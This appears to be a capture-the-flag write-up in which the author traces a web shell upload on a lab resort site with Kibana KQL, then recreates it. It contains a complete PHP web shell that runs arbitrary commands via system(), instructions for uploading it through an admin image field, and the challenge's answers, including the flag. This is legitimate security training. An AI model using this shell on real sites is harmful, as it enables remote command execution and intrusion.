PortfolioLinkedIn

Day 3

Even if I wanted to go, their vulnerabilities wouldn't allow it.

The target is a resort’s website, where an attacker uploaded a malicious web shell and exploited it. Our mission is twofold:

  1. Use log analysis with KQL (Kibana Query Language) to investigate the attack.

  2. Recreate the attack to retrieve the stolen flag.txt.

We start by analyzing logs from the frostypines-resorts dataset using KQL in Kibana. The timeframe is set from Oct 3, 2024, 11:30:00 to Oct 3, 2024, 12:00:00.

We also filter the logs for shell.php, which was the file uploaded by the attacker.

We see that the file was uploaded to the path /media/images/rooms/shell.phpand was accessed by 10.11.83.34.

Recreating the attack:

To do this, we can head on to http://frostypines.thm.

You need to add the IP address and the domain to your /etc/hosts file in Linux before proceeding.

By navigating to /admin, we gain access to an admin panel that includes a room creation feature with an image upload option.

Here, we can upload a PHP reverse shell (shell.php) as the room's image:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command'])) 
    {
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html>

The above script, when accessed, displays an input field. Whatever is entered in this input field is then run against the underlying operating system using the system() PHP function, and the output is displayed to the user.

Once the file is uploaded, it can be accessed at the following URL:

http://frostypines.thm/media/images/rooms/shell.php

On accessing the page, we have an input field and Execute button:

Try executing linux commands and retrieve the flag!

Questions.

1.BLUE: Where was the web shell uploaded to? Answer: /media/images/rooms/shell.php

2.BLUE: What IP address accessed the web shell?

Answer: 10.11.83.34

3.RED: What is the contents of the flag.txt?

Answer: THM{Gl1tch_Was_H3r3}

Thank you!

PreviousDay 2NextDay 4

Last updated

Was this helpful?